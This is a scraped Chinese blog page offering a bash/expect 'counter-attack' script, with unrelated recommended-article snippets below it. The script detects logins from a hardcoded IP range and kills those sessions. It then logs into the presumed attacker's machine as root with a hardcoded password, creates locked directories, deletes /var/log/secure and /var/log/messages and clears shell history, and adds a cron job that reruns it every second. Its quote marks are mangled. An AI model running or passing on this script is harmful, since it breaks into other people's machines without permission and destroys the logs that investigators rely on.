linux反攻击脚本

最新推荐文章于 2023-03-10 16:09:01 发布
最新推荐文章于 2023-03-10 16:09:01 发布
阅读量521 收藏
点赞数 1

!/bin/bash

改成非法连接ip段,我这里是用 176.202.140 这个ip段的

who=who | grep "176.202.140.*[^)]"

[ $? -eq 0 ] && echo “发现入侵者!开始回击” || continue

ipend=${who##*140.}

ipends=${ipend%%)}

攻击者ip

ip=’176.202.140.’$ipends

中断对方的攻击

pt=${who##*root}

pt1=${pt%%2018*}

pts=${pt1}

pkill -9 -t $pts

开始反击

set timeout 5
expect << EOF
spawn ssh -o StrictHostKeyChecking=no root@$ip
expect “password” { send “Taren1\n” }
expect “#” { send “cd /root/桌面\n” }
expect “#” { send “for ((i=1;i<=10;i++)) do mkdir 您已经被反入侵; done\n” }
expect “#” { send “chattr +ia 您已经被反入侵\n” }
expect “#” { send “rm -rf /var/log/secure /var/log/messages\n” }
expect “#” { send “history -c\n” }
expect “#” { send “rm -rf ~/.bash_history\n” }
expect “#” { send “exit\n” }
EOF

设置定时任务秒级执行
[root@192 ~]# for i in {1..59}; do echo “* * * * * sleep ${i}; /root/4.sh” >>/var/spool/cron/root; done

@||$?
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Poc/Exp漏洞验证利用脚本编写
悦分享
07-07 5407
一、安全名词1. POCPOC,Proof ofConcept,中⽂意思是“观点证明”。这个短语会在漏洞报告中使⽤,漏洞报告中的POC则是⼀段说明或者⼀个攻击的样例,使得读者能够确认这个漏洞是真实存在的。2. EXPEXP,Exploit,中文叫漏洞利用程序。意思就是该漏洞存在公开的利用方式(比如一个脚本),就是一段可以发挥漏洞价值的程序,对漏洞如何利⽤的详细说明或者⼀个演⽰的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利⽤的⽅法。想象一下这样的场景,目标存在一个 SQL 注入漏洞,然后被你知道了,然后
Linux中常见的攻击手段
岁月净好
04-28 507
已知的某个进程在处理某个权限的时候,造成了越权的情况,被人利用系统漏洞或程序漏洞发起攻击,进入未打补丁的系统。黑客首先利用网络扫描工具扫描目标主机的漏洞,然后根据扫描出的漏洞,有针对性地实施攻击,常见的有SQL注入漏洞攻击,网页权限漏洞“挂马”攻击等。常见的有拒绝服务攻击DoS与分布式拒绝服务攻击DDoS,黑客一般利用伪装的源地址或者控制其他多台主机,向目标发出大量的、连续的连接请求,服务器无法在短时间内接受这么多请求,就会造成系统资源耗尽,服务挂起,严重时会造成服务器瘫痪。Linux中常见的攻击手段。
Python安全之编写SQL注入漏洞利用脚本(EXP)
gaojian5422的博客
02-28 1439
本例中以靶机DVWA中的盲注为例。
Linux CC攻击脚本
lvwuwei的博客
05-02 4056
Linux CC攻击脚本 CC(ChallengeCollapsar)主要是用来攻击页面的。大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,访问的人越多,论坛的页面越多,数据库就越大,被访问的频率也越高,占用的系统资源也就相当可观。 最近在做一些防CC的措施,想验证效果就的有类似CC的攻击,所以写了个Python脚本来模拟CC攻击,其原理很简单,就...
Linux恶意攻击自查方案
W1124824402的博客
12-12 1618
实际上,/etc/rc.d/init.d和/etc/xinetd.d目录,以及/etc/rc.d/rc.local文件是通过软链接到/etc/rc*.d目录下执行加载的,而/etc/inittab是启动配置文件,因此重点关注/etc/rc0.d~rc6.d目录下的文件。注:各服务的启动脚本存放在/etc/init.d/和/etc/xinetd.d目录下,对于没有或无法使用chkconfig命令的系统,可通过创建或删除到/etc/rc*.d目录下的软链接,手工实现管理服务开机是否启动。
netcat 瑞士军刀 linux windows netcat 瑞士军刀 linux windows
04-15
本软件包含windows和linux两种版本 1、 了解NC的用法 命令:  nc –h 技巧:  win98用户可以在autoexec.bat加入path=nc的路径,win2000用户在环境变量中加入path中,linux含有这个命令(redhat) 1、基本使用  ...
Linux管理员指南
04-24
目 录 前言 第一部分 安装Linux操作系统 作为服务器软件 第1章 Linux发行版本与Windows NT的 技术异同 1 1.1 Linux操作系统和Linux发行版本 1 1.2 “自由”软件和GNU许可证 1 1.2.1 什么是...
antiflood:保护Apache免受HTTP泛滥
05-16
脚本有助于防止和抵消Linux上的Apache Floods / DDoS攻击。 不幸的是,它不像以前那样有效,因为许多DDoS攻击不是第7层,但是如果您根本没有任何保护,并继续使用apache服务器获取HTTP洪水,那么这将帮助您清除...
华为笔试题java-sec-daily-2019:2019年天融信阿尔法实验室在微信公众号发布的所有安全资讯汇总
06-03
编写Airbnb信息收集和提取脚本 Linux HIDS代理摘要和用户状态Hook [漏洞] .NET一个可导致RCE的序列化漏洞 FreeBSD fd提权漏洞 PS4 CVE-2018-4386 Exploit [工具] blc: 以插件的形式在IDA中集成Ghidra编译器 ...
Kali Linux-网络安全之-XSS 跨站脚本攻击原理及 DVWA 靶机的搭建
Button12138的博客
12-09 1424
我们输入的信息被存放在name。
Linux系统安全知识--防范黑客攻击
VN520的博客
03-10 478
经验表明,绝大多数的网络攻击,来自同事、网友和主机用户。这些人能直接或者间接地进入你的主机系统,甚至有可能知道你的密码。小小的疏漏,都会造成致命的错误。我曾经给我同事演示盗取他论坛密码,方法很简单,INCLUDE,然后ECHO,变量值就显示出来了,变量值里就存有密码,只有几行代码。我告诉他把密码直接写到论坛源码里去,这样就没事了。换个角度,你不是网管,只是主机上的用户,网管一个小小的失误,很可能会毁掉你的网站。日志里有各种访问信息,通过分析日志文件,你很容易发现试图进入你管理后台或者试图探测主机的人。
shell开发笔记
doubi6的博客
01-03 634
expect 解释器 expect(使用前需要先下载)是一个能实现自动和交互式任务的解释器,它也能解释常见的shell语法命令,其特色在以下几个命令: spawn命令: spawn command命令会fork一个子进程去执行command命令,然后在此子进程中执行后面的命令; 在ssh自动登陆脚本中,我们使用 spawn ssh user_name@ip_str,fork一个子进程执行ssh登陆命令; expect命令: expect命令是expect解释器的关键命令,它的一般用法为 expect "st
Linux下防御ddos攻击
qq_40907977的博客
12-04 3482
导读 Linux服务器在运营过程中可能会受到黑客攻击,常见的攻击方式有SYN,DDOS等。通过更换IP,查找被攻击的站点可能避开攻击,但是中断服务的时间比较长。比较彻底的解决方法是添置硬件防火墙。不过,硬件防火墙价格比较昂贵。可以考虑利用Linux 系统本身提供的防火墙功能来防御。 SYN攻击是利用TCP/IP协议3次握手的原理,发送大量的建立连接的网络包,但不实际建立连接,最终导致被攻击服务器的网络队列被占满,无法被正常用户访问。 Linux内核提供了若干SYN相关的配置,加大SYN队列长度可以容纳更多
一文吃透Linux提权
weixin_45727359的博客
11-07 2408
来自公众号:FreeBuf作者:dnsill0x001 linux提权描述大多数计算机系统设计为可与多个用户一起使用。特权是指允许用户执行的操作。普通特权包括查看和编辑文件或修改系统文件...
xig,Linux恶意攻击脚本进程之一
Luxuff的博客
10-20 5204
 首先说明一点,当你在搜索"xig"的时候,我可以肯定你的服务器已经被恶意攻击了, 原因很简单:绝大部分都是因为服务器连接密码设置过于简单。 回去改个密码再删删文件什么的基本就解决了,这种小白挖矿程序一般都只是占用服务器资源挖挖矿什么的,其他危害倒不严重。   由于之前我搜索“xig”的时候没遇到什么有针对性的文章,估计是已经很少有人犯这种错误了,但想想还是把细节写出来,引以为戒吧。  ...
服务器被攻击方式及防御措施?
咻一咻的博客
07-04 1万+
主流的服务器攻击方式有多种手段,但是唯独DDoS攻击、CC攻击以及ARP欺骗,这些攻击方式被称为三大攻击手段,不仅可以致使服务器瘫痪,而且还很无解。 DDOS攻击 DDoS攻击全名叫做分布式拒绝服务(DDoS:Distributed Denial of Service),攻击者往往将多个计算机平台联合起来对同一个目标或者多个目标进行攻击攻击所造成的后果也因此而严重程度不同。 DDoS攻...
Linux漏洞攻击实验
weixin_40754097的博客
05-21 4976
漏洞攻击实验 第一步 配置环境 攻击系统:VMware、Kali-linux Kali 是一个基于 Debian 的 Linux 发行版,面向专业的渗透测试和安全审计,言下之意就是它自带漏洞攻击的工具,可以用来做入侵测试。 靶机:Virtual box、Metasploitable-linux Metasploitable是故意设计用于测试安全工具的并展示常见易受攻击的漏洞的linux系统。言下之...
kali Linux命令大全
热门推荐
qq_41814777的博客
10-15 2万+
Kali Linux 命令集 系统信息 arch 显示机器的处理器架构(1) uname -m 显示机器的处理器架构(2) uname -r 显示正在使用的内核版本 dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI) hdparm -i /dev/hda 罗列一个磁盘的架构特性 hdparm -tT /dev/sda 在磁盘上执行测试性读取操作 cat /proc/cpu...
linux下使用ddos脚本防止ddos攻击
weixin_40501323的博客
12-30 1万+
DDOS概述: 分布式拒绝服务(DDoS:DistributedDenial of Service)攻击,指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力。 1.安装web服务器 安装yum install httpd ,拷贝文件cp /share mmexport1514566237016.jpg  /var/w
linux mongosh shell脚本
最新发布
09-04
Linux Mongosh Shell脚本是一种用于在Linux操作系统中操作Mongosh Shell的脚本语言。Mongosh Shell是与MongoDB数据库交互的命令行界面。 在Linux系统中,可以使用Shell脚本来执行各种Mongosh Shell命令,以便自动化...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值